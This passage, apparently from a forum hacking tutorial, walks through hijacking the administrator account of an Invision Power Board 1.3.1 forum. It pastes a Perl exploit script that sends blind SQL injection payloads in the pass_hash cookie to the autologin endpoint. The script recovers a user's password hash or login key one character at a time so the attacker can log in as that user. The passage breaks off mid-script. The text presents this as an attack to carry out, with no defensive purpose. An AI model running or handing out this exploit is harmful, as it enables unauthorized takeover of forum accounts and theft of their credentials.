Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member wewish to hack. In this case, we are hacking the administrator of "hackingsite", which is User ID "2". Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulationaround these forums. For those who don't have it, here:CODE#!/usr/bin/perl -w################################################################### This one actually works :) Just paste the outputted cookie into# your request header using livehttpheaders or something and you# will probably be logged in as that user. No need to decrypt it!# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com###############...###########use LWP::UserAgent;$ua = new LWP::UserAgent;$ua->agent("Mosiac 1.0" . $ua->agent);if (!$ARGV[0]) {$ARGV[0] = '';}if (!$ARGV[3]) {$ARGV[3] = '';}my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';my $user = $ARGV[1]; # userid to jack my $iver = $ARGV[2]; # version 1 or 2my $cpre = $ARGV[3]; # cookie prefixmy $dbug = $ARGV[4]; # debug?if (!$ARGV[2]){print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";exit;}my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");my $outputs = '';for( $i=1; $i < 33; $i++ ){for( $j=0; $j < 16; $j++ ){my $current = $charset[$j];my $sql = ( $iver < 2 ) ?"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);my $res = $ua->get($path, @cookie);# If we get a valid sql request then this# does not appear anywhere in the sources$pattern = '';$_ = $res->content;if ($dbug) { print };if ( !(/$pattern/) )